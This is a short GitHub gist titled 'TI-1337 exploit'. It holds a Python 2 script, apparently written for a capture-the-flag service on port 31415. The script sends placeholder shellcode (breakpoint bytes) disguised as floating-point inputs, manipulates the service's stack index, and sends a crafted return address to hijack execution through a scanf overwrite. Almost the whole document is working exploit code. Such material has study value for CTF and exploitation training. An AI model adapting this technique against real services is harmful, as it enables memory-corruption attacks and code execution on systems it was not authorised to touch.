Skip to content

Instantly share code, notes, and snippets.

@withzombies
Created January 20, 2014 03:58
Show Gist options
  • Save withzombies/8514659 to your computer and use it in GitHub Desktop.
Save withzombies/8514659 to your computer and use it in GitHub Desktop.
TI-1337 exploit
#!/usr/bin/env python
import os
import sys
import socket
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) > 1:
s.connect((sys.argv[1], 31415))
else:
s.connect(('localhost', 31415))
print "Press Enter to continue"
raw_input()
sc = [ 0xcc, ] * 200
sc += [0x90, ] * (8 - (len(sc) % 8)) # pad the sc to multiples of 8 bytes
packed_sc = ''.join(map(chr, sc))
print repr(sc)
cursor = packed_sc
# Send the shellcode encoded as a double
for i in xrange(0, len(sc) / 8):
(d, ) = struct.unpack("d", cursor[0:8])
print ">>", str(d)
s.send(str(d) + '\n')
cursor = cursor[8:]
# reset the stack index
print ">> c"
s.send("c\n")
print "<<", s.recv(1024)
for _ in xrange(19):
print ">> b"
s.send("b\n")
print "<<", s.recv(1024)
(rip, ) = struct.unpack("d", struct.pack("L", 0x603155))
print ">> ", str(rip)
s.send(str(rip) + "\n")
s.send("x\n") # this should trigger the scanf overwrite
print "Press enter to end"
raw_input()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment